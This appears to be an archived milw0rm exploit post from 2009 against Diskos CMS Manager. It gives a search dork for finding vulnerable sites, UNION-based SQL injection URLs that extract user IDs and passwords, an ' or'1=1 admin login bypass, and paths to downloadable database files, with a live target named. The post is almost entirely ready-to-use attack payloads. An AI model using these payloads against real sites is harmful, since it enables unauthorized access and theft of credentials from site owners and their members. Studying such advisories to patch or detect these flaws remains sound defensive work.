************************************************************
** Diskos CMS Manager & multiple vulnerabilitiesS
************************************************************
** Prodcut: Diskos CMS Manager
** Home : http://www.diskos.dk
** Vunlerability : SQL Injection & admin byapass & database disclosure
** Dork : "Powered By diskos"
** inurl:"side.asp?kat=1"
************************************************************
** Discovred by: AnGeL25dZ
** Contact : angel25dz@gmail.com
** *********************************************************
** Greetz to : ALLAH
** All Members of H-T (http://h-t.cc/cc)
** All Members of Islam-attack.com
*************************************************************
******************** SQL Injection **************************
*************************************************************
** Exploit:
** USERS :http://[PATH]/side.asp?kat=-1+union+all+select+brugerid+from+brugere
** ADMIn :http://[PATH]/side.asp?kat=-1+union+all+select+password+from+brugere
**
** Administration Login : http://[path]/diskos6/
**
**************************************************************
********************** Admin bypass **************************
**************************************************************
**
** Administration Login : http://[path]/diskos6/
** brugerid: ' or'1=1
** password: ' or'1=1
****************************************************************
******************** database disclosure **********************
****************************************************************
** http://[path]/db/log.mdb
** artikler_prod.mdb
** medlemmer.mdb
******************************************************************
** Live demo : http://www.diskos.dk/
****************************************************************
# milw0rm.com [2009-03-30]
